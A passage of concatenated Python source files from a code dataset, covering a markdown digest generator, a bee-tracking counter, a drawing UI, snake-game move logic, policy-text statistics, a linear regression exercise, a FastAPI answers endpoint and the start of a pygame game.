com_cookie_time)\n","sub_path":"api/base_auth.py","file_name":"base_auth.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"580786834","text":"from datetime import date\nimport time\n\nfrom src import JobHdl\n\n__author__ = 'zhangzhao'\n\n\nclass MarkDownGenerator(object):\n def __init__(self, out_file_path: str, the_date=None):\n self.date = the_date\n self.final_string = ''\n self.out_put_path = out_file_path\n self.entry = JobHdl()\n self.final_status_string = ''\n self.final_comment_string = ''\n self.meta = '\\n
This digest is generated automatically by OhMyLifeRecorder.
\\n' \\\n 'You can get more information here: [https://github.com/zz090923610/OhMyLifeRecorder](https://github.com/zz090923610/OhMyLifeRecorder)'\n\n def generate_daily_digest_header(self):\n self.final_string += '

OhMyLifeRecorder Daily Digest: ' + str(self.date) + '

\\n'\n\n\n def generate_daily_digest_an_entry(self, job_entry):\n entry = job_entry\n temp_status_string = '\\t\\t
    \\n'\n temp_comment_string = '\\t\\t
      \\n'\n status_modified_today = False\n comment_modified_today = False\n for loop in entry.status_change_list:\n if date.fromtimestamp(float(loop['time'])) == self.date:\n status_modified_today = True\n temp_status_string += '\\t\\t\\t
    • ' + time.strftime('%H:%M:%S ',\n time.localtime(float(loop['time']))) + loop[\n 'to'] + '
    • \\n'\n temp_status_string += '\\t\\t
    \\n'\n if status_modified_today is True:\n self.final_status_string += '\\t
  • Spent time on ' + entry.name + ':\\n' + temp_status_string + '\\t
  • \\n'\n\n for loop in entry.comment_list:\n if date.fromtimestamp(float(loop['time'])) == self.date:\n comment_modified_today = True\n temp_comment_string += '\\t\\t\\t
  • ' + time.strftime('%H:%M:%S ',\n time.localtime(float(loop['time']))) + \\\n loop['content'] + '
  • \\n'\n temp_comment_string += '\\t\\t
\\n'\n if comment_modified_today is True:\n self.final_comment_string += '\\t
  • Story about ' + entry.name + ':\\n' + \\\n temp_comment_string + '\\t
  • \\n'\n\n def generate_daily_digest(self):\n self.generate_daily_digest_header()\n if (self.final_status_string == '') & (self.final_comment_string == ''):\n self.final_string += '\\n

    '\n if self.final_status_string != '':\n self.final_string += '

    What I\\'ve done today:

    \\n'\n self.final_string += '\\n
      \\n' + self.final_status_string + '
    \\n'\n if self.final_comment_string != '':\n self.final_string += '

    Diary:

    \\n'\n self.final_string += '\\n
      \\n' + self.final_comment_string + '
    \\n'\n self.final_string += self.meta\n self.write_out()\n return self.final_string\n\n def generate_job_header(self):\n self.final_string += '

    OhMyLifeRecorder Digest

    \\n'\n self.final_string += '

    ' + self.entry.name + '

    \\n'\n self.final_string += 'Created: ' + time.strftime(\n '%Y-%m-%d, %H:%M:%S ', time.localtime(self.entry.create_time)) + '\\n\\n'\n self.final_string += 'Status: ' + self.entry.status + ' since ' + time.strftime(\n '%Y-%m-%d, %H:%M:%S ', time.localtime(self.entry.status_change_time)) + '\\n\\n'\n\n def generate_status_change_data(self):\n self.final_string += '

    Status change history:

    \\n
      \\n'\n for loop in self.entry.status_change_list:\n self.final_string += '
    • ' + time.strftime('%m-%d, %H:%M:%S: ', time.localtime(float(loop['time']))) + \\\n 'status changed from ' + \\\n loop['from'] + ' to ' + loop['to'] + '
    • \\n'\n self.final_string += '\\n
    \\n'\n\n def generate_comments(self):\n self.final_string += '

    Diary:

    \\n
      \\n'\n for loop in self.entry.comment_list:\n self.final_string += '
    • ' + time.strftime('%m-%d, %H:%M:%S: ',\n time.localtime(float(loop['time']))) + loop['content'] + \\\n '
    • \\n'\n def write_out(self):\n with open(self.out_put_path, mode='w', encoding='utf-8') as a_file:\n a_file.write(self.final_string)\n\n def generate_process(self):\n self.generate_job_header()\n self.generate_status_change_data()\n self.generate_comments()\n self.write_out()","sub_path":"legacy/src/markdown_generator.py","file_name":"markdown_generator.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"184095481","text":"from datetime import datetime\nfrom Tracking.iou_tracker import Tracker\nfrom collections import OrderedDict\nfrom collections import Counter\nfrom tqdm import tqdm\nimport numpy as np\nimport sqlite3\nimport cv2\n\nDB_PATH = '/Users/pascal/Coding/MP_bees/object_tracking/bees.db'\n# PATH_TO_VIDEO = '/Users/pascal/Coding/MP_bees/simple_object_tracking/videos/Froh_23_20191013_075648_540_M.mp4'\n# PATH_TO_VIDEO = '/Users/pascal/Coding/MP_bees/videos/bees_2.mp4'\nPATH_TO_VIDEO = '/Users/pascal/Coding/MP_bees/object_tracking/videos/' \\\n '118_Doettingen_Hive1_200820_gopro8_1080_200fps_W_short.mp4'\n# ALT_PATH_TO_VIDEO = '/content/gdrive/My Drive/Bees/data/Froh_23_20191013_075648_540_M.mp4'\nALT_PATH_TO_VIDEO = '/content/gdrive/My Drive/Bees/data/high_fps/' \\\n '118_Doettingen_Hive1_200820_gopro8_1080_100fps_W_short.mp4'\nRUN_ID = 28\nPLOT = False\n\n\nconn = sqlite3.connect(DB_PATH)\nc = conn.cursor()\n\n\ndef get_coordinates_from_db(run_id, video, frame_nr):\n c.execute(\n \"select * from coordinates where run_id = {} and video = '{}' and frame = {}\".format(run_id, video, frame_nr))\n return c.fetchall()\n\ncap = cv2.VideoCapture(PATH_TO_VIDEO)\nfps = int(cap.get(cv2.CAP_PROP_FPS))\nwidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nheight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\ndateTimeObj = datetime.now()\ntime_stamp = dateTimeObj.strftime(\"%d_%b_%Y_%H_%M_%S.%f\")\n\nskip_param = 8\nfps = fps / skip_param\nprint(fps)\n\n# dist_threshold, max_frame_skipped, max_trace_length, iou_threshold\nif fps == 200:\n ct = Tracker(50, 20, 50, 0.5)\nif fps == 100:\n ct = Tracker(100, 15, 50, 0.2)\nif fps == 50:\n ct = Tracker(150, 10, 50, 0.005)\nif fps == 25:\n ct = Tracker(250, 5, 50, 0.0025)\n\ndetections = []\n\n# Create blank image for entrance contour detection\n\nblank_image = np.zeros((height, width, 3), np.uint8)\nblank_image[:, :] = (255, 255, 255)\n\nimg_center_x = width // 2 - 55\nimg_center_y = height // 2 - 20\n# for united queens circle!\n# cv2.circle(blank_image, (img_center_x, img_center_y), 135, (0, 0, 0), 5)\ncv2.rectangle(blank_image, (660, 190), (1085, 260), (0, 0, 0),\n 5) # first tuple is the start, second tuple the end coordinates\n\ngray = cv2.cvtColor(blank_image, cv2.COLOR_BGR2GRAY)\ngray = cv2.bilateralFilter(gray, 11, 17, 17)\nedged = cv2.Canny(gray, 200, 800, 1)\ncontours = cv2.findContours(edged, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\ncontours = contours[0] if len(contours) == 2 else contours[1]\n\ntraffic_dict = OrderedDict()\nbee_in = 0\nbee_out = 0\nactivity = \"\"\n\nframe = 0\nframe_counter = 0\nall_tracks = {}\nin_counted = []\nout_counted = []\n\ntotal_matches, total_no_matches = [], []\n\nc.execute(\"select max(frame) from coordinates where run_id = {}\".format(RUN_ID))\nmax_frame = c.fetchall()[0][0]\n\nfor frame in tqdm(range(1, max_frame, skip_param)):\n coordinates = get_coordinates_from_db(RUN_ID, ALT_PATH_TO_VIDEO, frame)\n frame_counter += 1\n\n rects = []\n for i in range(len(coordinates)):\n r_id, f_name, fr, b_id, xmin, xmax, ymin, ymax, X, Y, conf = coordinates[i]\n rects.append([xmin, ymin, xmax, ymax])\n\n objects, tracks, D, iou_scores, match, no_match = ct.update(rects)\n\n total_matches.append(match)\n total_no_matches.append(no_match)\n\n if PLOT:\n for key, values in tracks.items():\n if key not in all_tracks:\n all_tracks[key] = values\n else:\n all_tracks[key].append(values[-1])\n\n for (objectID, coordinates) in objects.items():\n if len(traffic_dict) == 0:\n traffic_dict[objectID] = []\n\n for cnt in contours:\n centroid_x = coordinates[0] + (coordinates[2] - coordinates[0]) // 2\n centroid_y = coordinates[1] + (coordinates[3] - coordinates[1]) // 2\n centroid = (centroid_x, centroid_y)\n res = cv2.pointPolygonTest(cnt, (centroid_x, centroid_y), False)\n traffic_dict[objectID].append(res)\n\n IN = False\n if res == 1 or res == 0:\n IN = True\n\n try:\n len(traffic_dict[objectID + 1])\n except KeyError:\n traffic_dict[objectID + 1] = []\n\n if len(traffic_dict) > 0:\n for tb_id, tb_value in traffic_dict.items():\n if len(tb_value) == 0:\n continue\n if tb_id not in objects:\n last_counter = Counter(tb_value[-20:])\n total_counter = Counter(tb_value)\n if tb_value[0] == -1 and total_counter[-1] >= fps // 20 and last_counter[1] >= fps // 20:\n bee_in += 1\n traffic_dict[tb_id] = []\n activity = \"Bee {} flew in\".format(tb_id)\n in_counted.append(tb_id)\n if tb_value[0] == 1 and total_counter[1] >= fps // 20 and last_counter[-1] >= fps // 20:\n bee_out += 1\n traffic_dict[tb_id] = []\n activity = \"Bee {} flew out\".format(tb_id)\n out_counted.append(tb_id)\n\n info = [(\"Frame\", frame), (\"FPS\", fps), (\"Last activity\", activity), (\"Nr of Bees\", int(len(objects))),\n (\"Out\", bee_out),\n (\"In\", bee_in)]\n\n if frame_counter % 100 == 0:\n break\n print(info)\n print(traffic_dict)\n\n\nif PLOT:\n for cnt in contours:\n cv2.drawContours(blank_image, [cnt], -1, (36, 255, 12), 2)\n\n\n disappeared = out_counted + in_counted\n for id in disappeared:\n if id in all_tracks.keys():\n for point in all_tracks[id]:\n if id in out_counted:\n color = (255,0,0)\n elif id in in_counted:\n color = (0,255,0)\n cv2.circle(blank_image, (point[0], point[1]), 1, color, -1)\n cv2.putText(blank_image, str(id), (point[0] - 30, point[1] + 30), 0, 0.7,\n color, 1)\n for (i, (k, v)) in enumerate(info):\n text = \"{}: {}\".format(k, v)\n cv2.putText(blank_image, text, (10, int(height) - ((i * 20) + 20)), cv2.FONT_HERSHEY_SIMPLEX, 0.7,\n (0, 0, 0),\n 1)\n\n\n import matplotlib.pyplot as plt\n fig1 = plt.figure()\n plt.imshow(blank_image)\n plt.show()\n fig1.savefig('example.png', dpi = 1000)\n\nprint(info)\nconn.close()\n","sub_path":"headless_counting.py","file_name":"headless_counting.py","file_ext":"py","file_size_in_byte":6343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"579287776","text":"# -*- coding: utf-8 -*-\r\nimport socket\r\n\r\n\r\ndef socket_get_way(host, port, socket_package):\r\n BufferSize = 1024 * 1000\r\n coon = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n coon.connect((host, port))\r\n coon.sendall(socket_package.encode('utf8'))\r\n receive_data = coon.recv(BufferSize)\r\n return receive_data","sub_path":"basic/socket_request_way.py","file_name":"socket_request_way.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"13306070","text":"import tkinter as tk\nfrom PIL import ImageGrab\n\nwindow = tk.Tk()\n\nwindow.title('UI')\n\n\ncanvas = tk.Canvas(window,width = 512,height = 512,bg='white')\ncanvas.pack()\n\n\ndef paint(event):\n x1, y1 = (event.x - 3), (event.y - 3)\n x2, y2 = (event.x + 3), (event.y + 3)\n canvas.create_oval(x1, y1, x2, y2, fill='black')\n #canvas.create_oval(x1, y1, x2, y2)\n\ncanvas.bind(\"\", paint)\n\ndef submit():\n print('set')\n\ndef clear():\n canvas.delete(\"all\")\n\ndef save():\n x = window.winfo_rootx() + canvas.winfo_x() + 2\n y = window.winfo_rooty() + canvas.winfo_y() + 2\n x1 = x + canvas.winfo_width() - 4\n y1 = y + canvas.winfo_height() - 4\n ImageGrab.grab().crop((x, y, x1, y1)).save(\"temp.jpg\")\n\n\nsubmit_bt = tk.Button(window, text='submit', font=('Arial', 18), width=10, height=1, command = submit)\nsubmit_bt.pack(side='left')\n\nclaer_bt = tk.Button(window, text='claer', font=('Arial', 18), width=10, height=1, command = clear)\nclaer_bt.pack(side='left')\n\nsave_bt = tk.Button(window, text='save', font=('Arial', 18), width=10, height=1, command = save)\nsave_bt.pack(side='left')\n\nwindow.mainloop()","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"363989066","text":"\n# coding: utf-8\n\n# In[2]:\n\nimport pandas as pd\nimport numpy as np\nfrom pandas import DataFrame\n\n\n# In[103]:\n\nframe = pd.read_csv('\\\\Users\\\\kruts\\\\DataAnalysis4Python_Spring17\\\\Assignments\\\\Assignment 3\\\\Data\\\\movies_awards.csv')\n\n\n# In[104]:\n\n#Creating a dataframe with only Awards\ndf= DataFrame(frame, columns = ['Awards'])\n#Eliminating columns with value 'NaN'\ndf = df.dropna() \n\n\n# In[110]:\n\n# Fetching the wins and nominations from the awards column\ndf['Awards_won']= df['Awards'].str.extract('(\\d+) win',expand = True)\ndf['Awards_nominated'] = df['Awards'].str.extract('(\\d+) nomination',expand = True)\ndf['Prime_Awards_won'] = df['Awards'].str.extract('Won (\\d+) Primetime',expand = True)\ndf['Prime_Awards_nominated'] = df['Awards'].str.extract('Nominated for (\\d+) PrimeTime',expand = True)\ndf['Bafta_Awards_won'] = df['Awards'].str.extract('Won (\\d+) BAFTA',expand = True)\ndf['Bafta_Awards_nominated'] = df['Awards'].str.extract('Nominated for (\\d+) BAFTA',expand = True)\ndf['Oscar_Awards_won'] = df['Awards'].str.extract('Won (\\d+) Oscar',expand = True)\ndf['Oscar_Awards_nominated'] = df['Awards'].str.extract('Nominated for (\\d+) Oscar',expand = True)\ndf['GoldenGlobe_Awards_won'] = df['Awards'].str.extract('Won (\\d+) Golden Globe',expand = True)\ndf['GoldenGlobe_Awards_nominated'] = df['Awards'].str.extract('Nominated for (\\d+) Golden Globe',expand = True)\n\n\n# In[111]:\n\ndf = df.fillna(0)\ndf\n\n\n# In[115]:\n\n# Converting objects to int\ndf['Awards_won'] = df['Awards_won'].astype(str).astype(int)\ndf['Awards_nominated'] =df['Awards_nominated'].astype(str).astype(int) \ndf['Prime_Awards_won'] = df['Prime_Awards_won'].astype(str).astype(int)\ndf['Prime_Awards_nominated']=df['Prime_Awards_nominated'].astype(str).astype(int)\ndf['Bafta_Awards_won']=df['Bafta_Awards_won'].astype(str).astype(int) \ndf['Bafta_Awards_nominated']=df['Bafta_Awards_nominated'].astype(str).astype(int)\ndf['Oscar_Awards_won']=df['Oscar_Awards_won'].astype(str).astype(int) \ndf['Oscar_Awards_nominated']=df['Oscar_Awards_nominated'].astype(str).astype(int)\ndf['GoldenGlobe_Awards_won']=df['GoldenGlobe_Awards_won'].astype(str).astype(int)\ndf['GoldenGlobe_Awards_nominated']=df['GoldenGlobe_Awards_nominated'].astype(str).astype(int)\n\n\n# In[79]:\n\ndf['Awards_won'] = df['Awards_won']+df['Prime_Awards_won']+df['Bafta_Awards_won']+df['Oscar_Awards_won']+df['GoldenGlobe_Awards_won']\ndf['Awards_nominated']=df['Awards_nominated']+df['Prime_Awards_nominated']+df['Bafta_Awards_nominated']+df['Oscar_Awards_nominated']+df['GoldenGlobe_Awards_nominated']\n\n\n# In[113]:\n\nprint(df.head())\n\n\n# In[114]:\n\ndf.to_csv('Q4_Part_1.csv') #Generating csv for the above result\n\n","sub_path":"Assignment3/Q4_Part_1.py","file_name":"Q4_Part_1.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"613200192","text":"from maths import distance_between\ndef assign(target):\n u = {\n \"x\":target['x'],\n \"y\":target['y'] + 1,\n }\n d = {\n \"x\":target['x'],\n \"y\":target['y'] - 1,\n }\n r = {\n \"x\":target['x'] + 1,\n \"y\":target['y'],\n }\n l = {\n \"x\":target['x'] - 1,\n \"y\":target['y'],\n }\n return u, d, l, r\n\ndef getPossibleMoves(bodies, startCoord, data, mybody, trapped = False, shouldprint = False):\n open_squares = [startCoord]\n if startCoord in bodies:\n return 0\n width = data['board']['width']\n height = data['board']['height']\n DANGER = 0\n for i in range(2):\n for coord in open_squares:\n temp_coords = []\n temp_coords = assign(coord)\n for minicoord in temp_coords:\n if len(open_squares) > len(mybody):\n break\n if shouldprint:\n print(-1 len(data['board']['snakes'][i]['body']):\n heads.append(data['board']['snakes'][i]['head'])\n return heads\n\ndef get_dangerous_heads(data):\n heads = []\n for i in range(len(data['board']['snakes'])):\n if len(data['you']['body']) <= len(data['board']['snakes'][i]['body']) and data['board']['snakes'][i]['name'] != data['you']['name']:\n heads.append(data['board']['snakes'][i]['head'])\n return heads\n\ndef getBodies(data):\n bodies = []\n for j in range(len(data['board']['snakes'])):\n for k in range(len(data['board']['snakes'][j]['body']) - 1):\n #wow so many brackets\n bodies.append(data['board']['snakes'][j]['body'][k])\n return bodies\n\ndef indvBodies(data):\n bodies = []\n for j in range(len(data['board']['snakes'])):\n thisBody= []\n for k in range(len(data['board']['snakes'][j]['body']) - 1):\n #wow so many brackets\n thisBody.append(data['board']['snakes'][j]['body'][k])\n bodies.append(thisBody)\n return bodies\n\ndef safe(target, oh, ob, myh, mb):\n #oh for other's heads\n\n #ob for other's bodies\n close_units = []\n for i in range(3):\n y = target['y'] + i - 1\n for j in range(3):\n x = target['x'] + j - 1\n dct = {\n \"x\":x,\n \"y\":y,\n }\n #print(dct)\n if dct in oh:\n for body in ob:\n if body[0] == dct:\n length = len(body)\n #print(length)\n if length >= len(mb):\n close_units.append(dct)\n return close_units\ndef onlyOneWayToGo(data, target, shouldPrint):\n body = getBodies(data)\n movedUp, movedDown, movedRight, movedLeft = assign(target)\n moveList = [movedUp, movedDown, movedRight, movedLeft]\n moveScore = [None, None, None, None]\n for m in range(4):\n if not moveList[m] in body and -1= len(mybody) or head == myhead:\n can_go = False\n if can_go:\n areas = assign(head)\n for coord in areas:\n if coord in bodies:\n bodies.pop(bodies.index(coord))\n else:\n ret.append(coord)\n return ret\n\n\ndef i_am_closest(heads, myhead, target):\n for head in heads:\n if distance_between(head, target) < distance_between(myhead, target):\n return False\n return True\n\n\n\n\ndef trapped(bodies, target, data, shouldPrint):\n movedUp, movedDown, movedRight, movedLeft = assign(target)\n moveList = [movedUp, movedDown, movedRight, movedLeft]\n moveScore = [None, None, None, None]\n for m in range(4):\n if not moveList[m] in bodies and -1= 2020)].index)) # 保留2010-2019\r\n print(tempdf.shape)\r\n dflist.append(tempdf)\r\n# dfdict = dict(zip(provls, dflist))\r\ndf = pd.concat(dflist)\r\ndf.to_csv(r'D:\\3policyAyc\\_database\\_policytxt\\Wordlist_all0.csv', encoding=\"utf_8_sig\", index=False)\r\n\r\nfun_statis = Fun_statis() # initialize the class\r\n# df_nation = pd.read_excel(r'./txtdata/nationalPolicy.xlsx')\r\n# df_guangdong = pd\r\n# df.jiangsu = pd\r\n# df1 = df[1:5]\r\n# df3 = df1.drop(index=df1.loc[[\"通知\" in x for x in df1['title'].values.tolist()]].index)\r\n# df3 = df1.drop(index=df2.index)\r\n# df_check = df.loc[[\"目录\" in x for x in df['title'].values.tolist()]] # 取索引为2的行\r\n\"\"\"1.政策发布时间分布,2010-2019的文本\"\"\"\r\nyearlist = df['year'].tolist()\r\nsyear = pd.Series(yearlist)\r\ncountDict = dict(syear.value_counts()) # frequency calculation\r\ntemp_df1 = pd.DataFrame(data=countDict, index = ['Count'])\r\nproportionDict = dict(syear.value_counts(normalize=True))\r\ntemp_df2 = pd.DataFrame(data=proportionDict, index = ['Frequency'])\r\nyear_df = pd.concat([temp_df1,temp_df2])\r\nyear_df.to_excel('./_database/_interresults/stat_by_year.xlsx')\r\n\r\n\r\n\"\"\"2.政策发布机构分析\"\"\"\r\nbodies = fun_statis.issuersplit(df['issuer'].tolist()) # extract policy issuers\r\nbodyDic = pd.Series(bodies).value_counts()\r\ntempbodydf = pd.DataFrame(data=bodyDic)\r\ntempbodydf.to_excel('D:/3policyAyc/Rawpolicybodies.xlsx')\r\n\r\n# simplify and merge similar bodies\r\nsimpbodyDict = fun_statis.bodySimplify(bodyDic)\r\ndf_body = pd.DataFrame(data=simpbodyDict, index=['Count'])\r\ndf_body.to_excel('D:/3policyAyc/_database/_interresults/stat_by_issuer.xlsx') # 测试,找出发布频率高的主体\r\n\r\n\"\"\"3.词频分布统计\"\"\"\r\nwordlist, ptextlist = [],[]\r\nfor entry in df['ptext'].tolist():\r\n temp = entry.split('\\n')\r\n ptextlist.append(temp)\r\n wordlist.extend(temp)\r\n# 统计词频\r\nwordfreq = collections.Counter(wordlist)\r\nmostfreqlist = wordfreq.most_common(100) # 查看出现频率最高的n个词\r\ntempk, tempv = [],[]\r\nfor tup in mostfreqlist:\r\n tempk.append(tup[0])\r\n tempv.append(tup[1])\r\nmostfreqdic = {'Word': tempk, 'Count': tempv}\r\ndf_mostfreq = pd.DataFrame(mostfreqdic)\r\n# wordfreq = wordseries.value_counts(normalize=True)\r\ndf_mostfreq.to_excel('D:/3policyAyc/_database/_interresults/wordfreq_distribution.xlsx')\r\n\r\n# tf-idf\r\n# ptextDict = corpora.Dictionary(ptextlist)\r\n# corpus_ptext = [ptextDict.doc2bow(w) for w in ptextlist] # doc2bow(1,2)表示第*篇文档中编号1的单词出现2次\r\n# tf_idf_model = TfidfModel(corpus_ptext, normalize=True)\r\n# word_tf_idf = list(tf_idf_model[ptextDict.token2id])\r\n# count = 0\r\n# for it in word_tf_idf:\r\n# count+= len(it)\r\n# print(count)\r\n# sorted_words = sorted(b.items(), key=lambda x: x[1], reverse=True)\r\n# tfidf_df = pd.DataFrame([(tup[0],tup[1]) for a in word_tf_idf for tup in a], columns=['Word','Code'])\r\n# tokenid_df = pd.DataFrame([(k,v) for k,v in ptextDict.items()], columns=['Code', 'TF-IDFvalue'])\r\n# tf_idfDic = {} # 结果转为字典形式\r\n# for it in word_tf_idf:\r\n# for tup in it:\r\n# tf_idfDic.update({tup[0]:tup[1]})\r\n# tokenid_df = pd.DataFrame(data=ptextDict.token2id, columns=['Word','Code'])\r\n# tokenid_df['Code'].dtype\r\n# tfidf_df = pd.DataFrame(data=tf_idfDic, index=['Code', 'TF-IDFvalue'])\r\n# tfidf_df['Code'].dtype\r\n#\r\n# wordtfidf\r\n# DDI = cordi.id2token\r\n#\r\n#\r\n#\r\n# organs = []\r\n# pat = re.compile(r'/|[ ]+|、|,|//|,')\r\n# pat1 = re.compile(r'[\\\\u3000]+|[\\u3000]+|[\\xa0]+|[?]+')\r\n# for it in organlist:\r\n# if isinstance(it,str):\r\n# if re.search(pat1,it):\r\n# tmp = ''.join(re.split(pat1,it))\r\n# organs.extend(re.split(pat,tmp))\r\n# else:\r\n# organs.extend(re.split(pat,it))\r\n#\r\n# from collections import Counter\r\n# orgcount = Counter(organs)\r\n# orgcount.pop('')\r\n# orgcount.pop('建设部(已撤销)')\r\n# for k,v in orgcount.items():\r\n# if '委员会' in k:\r\n# k_new = k.replace('委员会','委')\r\n# orgcount[k_new] = orgcount.pop(k)\r\n# orgcount\r\n#\r\n# def getMatch(pat, sstr = '财政部科技部工业和信息化部发展改革委'):\r\n# '''获取所有匹配的部分及其索引,返回tuple_list\r\n# pat:正则匹配表达式\r\n# sstr:待搜索的字符串\r\n# '''\r\n# if re.search(pat,sstr):\r\n# all_ind = []\r\n# all_find = re.findall(pat,sstr)\r\n# for it in all_find:\r\n# all_ind.append(sstr.index(it))\r\n# sstr = sstr.replace(it,'爨',1)\r\n# mat_tuple = tuple(zip(all_find,all_ind))\r\n# return list(mat_tuple)\r\n# else:\r\n# print('Nothing had been matched to the given string!')\r\n# return\r\n#\r\n# pat2 = '部|局|委'\r\n# div_list = []\r\n# for k,v in list(orgcount.items()):\r\n# # count.append(v)\r\n# # ss = pd.Series(count)\r\n# # ss.value_counts()\r\n# if len(re.findall(pat2,k))>=2:\r\n# matlist = getMatch(pat2,k)\r\n# tmp_dic = {}\r\n# for i,tup in enumerate(matlist):\r\n# new_key = ''\r\n# if i == 0:\r\n# new_key = k[0:tup[1]+1]\r\n# else:\r\n# new_key = k[matlist[i-1][1]+1:tup[1]+1]\r\n# tmp_dic.update({new_key:v})\r\n# div_list.append(tmp_dic)\r\n#\r\n# for dic in div_list:\r\n# for dic_k in dic.keys():\r\n# if dic_k in orgcount:\r\n# td = {dic_k:dic.get(dic_k)+orgcount.get(dic_k)}\r\n# orgcount.pop(dic_k)\r\n# orgcount.update(td)\r\n# else:\r\n# orgcount.update({dic_k:dic.get(dic_k)})\r\n#\r\n# for k,v in list(orgcount.items()):\r\n# if len(re.findall(pat2,k))>=2:\r\n# orgcount.pop(k)\r\n# orgcount\r\n# org_bac = orgcount.copy()\r\n# orgcount = org_bac.copy()\r\n#\r\n# for k in list(orgcount.keys()):\r\n# tl = re.split(pat2,k)\r\n# if len(tl)>1 and tl[1]:\r\n# tl[0] = tl[0]+re.search(pat2,k).group()\r\n# if tl[0] in orgcount:\r\n# td = {tl[0]:orgcount.get(k)+orgcount.get(tl[0])}\r\n# orgcount.pop(k)\r\n# orgcount.pop(tl[0])\r\n# orgcount.update(td)\r\n# else:\r\n# orgcount[tl[0]] = orgcount.pop(k)\r\n#\r\n# df_organ = pd.DataFrame.from_dict(orgcount, orient='index',columns=['pieces'])\r\n# df_organ = df_organ.reset_index().rename(columns = {'index':'organization'})\r\n# df_organ.to_excel('./_interresults/by_organ1.xlsx')\r\n","sub_path":"statAyc/policyDistribution.py","file_name":"policyDistribution.py","file_ext":"py","file_size_in_byte":7103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"365186856","text":"# Linear regression\n\nimport os \nimport pandas as pd \nimport matplotlib.pyplot as plt \nimport numpy as np \n\nimport module_ex1 as ex1\n\n\n\"\"\" =================== Main ex1data1 ============================ \"\"\"\n# import data and visualize data\ndata = pd.read_csv('ex1data1.txt', header=None,names=['Population','Profit'])\ndata.plot(kind='scatter', x='Population', y='Profit', figsize=(12,8))\n\nalpha = 0.01 # Learning rate\niters = 1000 # Interation number of gradient descent\ng, cost = ex1.perform(data, np.zeros((1, 2)), alpha, iters)\n\n# view the results\nx = np.linspace(data.Population.min(), data.Population.max(), 100)\nf = g[0,0] + (g[0,1] * x)\n\nfig, ax = plt.subplots(figsize=(12,8))\nax.plot(x, f, 'r', label='Prediction')\nax.scatter(data.Population, data.Profit, label='Training data')\nax.legend(loc = 2)\nax.set_xlabel('Population')\nax.set_ylabel('Profit')\nax.set_title('Predicted profit vs. Population Size')\n\nfig, ax = plt.subplots(figsize=(12,8))\nax.plot(np.arange(iters), cost, 'r')\nax.set_xlabel('Iterations')\nax.set_ylabel('Cost')\nax.set_title('Error vs. Training Epoch')\n\n\"\"\" ==================Main ex1data2==================== \"\"\"\ndata = pd.read_csv('ex1data2.txt', header = None, names=['Size','Bedrooms','Price'])\ndata = (data - data.mean()) / data.std() # features normalization\n\n#define\nalpha = 0.01\niters = 750\ng, cost = ex1.perform(data, np.zeros((1, 3)), alpha, iters)\n\nfig, ax = plt.subplots(figsize=(12,8))\nax.plot(np.arange(iters), cost, 'r')\nax.set_xlabel('Iterations')\nax.set_ylabel('Cost')\nax.set_title('Error vs. Training Epoch aaa')\n\nplt.show()\n","sub_path":"ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"482428453","text":"from datetime import date, datetime\nfrom typing import List\n\nfrom fastapi import APIRouter, HTTPException, Request, Body\nfrom pydantic import BaseModel\nfrom requests import HTTPError\nfrom structlog import get_logger\n\nfrom .. import config\n\nfrom elasticsearch import Elasticsearch\n\nfrom ..search.search_index import query_question\n\nrouter = APIRouter()\nlog = get_logger()\n\n\nclass Answers(BaseModel):\n answers: List[str]\n\nclass ElasticResults(BaseModel):\n doc_text: List[str]\n doc_url: str\n section_text: List[str]\n section_url: str\n\nconf = config.get()\n\nes = Elasticsearch(\n [{\"host\": conf.elastic_search_host, \"port\": 443}],\n use_ssl=True,\n verify_certs=True,\n)\n\n\n# @router.get(\"/answers/\", response_model=Answers)\n@router.get(\"/answers/\")\ndef answers(request: Request, data=Body(dict())):\n\n log.debug('data',data=data)\n question = data['question']\n print(question)\n print(request)\n\n log.info(\"answers\", question=question)\n\n language = request.headers.get('Accept-Language')\n\n res_doc_txt, res_sec_txt = query_question(es, question, language)\n\n # answer = Answers.parse_obj(res_sec_txt)\n\n return language\n","sub_path":"covidfaq/routers/answers.py","file_name":"answers.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"35372688","text":"import pygame\r\nfrom pygame.locals import *\r\nfrom sys import exit\r\nimport os\r\n\r\ndef main():\r\n pygame.init()\r\n\r\n arquivo = open(\"Tela.txt\", \"r\")\r\n conteudo = arquivo.read()\r\n arquivo.close()\r\n\r\n #DEFINICAO DA TELA\r\n tamanho_da_tela = largura, altura = 800, 600\r\n pygame.display.set_caption(\"Batalha Naval - Creditos\")\r\n if conteudo == \"Tela Cheia\":\r\n tela = pygame.display.set_mode( tamanho_da_tela, FULLSCREEN, 32 )\r\n elif conteudo == \"Janela\":\r\n tela = pygame.display.set_mode( tamanho_da_tela, 0, 32 )\r\n\r\n #MUSICA\r\n pygame.mixer.music.load(\"audio\" + os.sep + \"sub_menu.mp3\")\r\n pygame.mixer.music.play(-1)\r\n\r\n sobre_opcao = pygame.mixer.Sound(\"audio\" + os.sep + \"sobre_opcao.wav\")\r\n escolhe_opcao = pygame.mixer.Sound(\"audio\" + os.sep + \"escolhe_opcao.wav\")\r\n som1 = False\r\n\r\n #CARREGANDO IMAGENS\r\n jaca_game = pygame.image.load(\"imagens\" + os.sep + 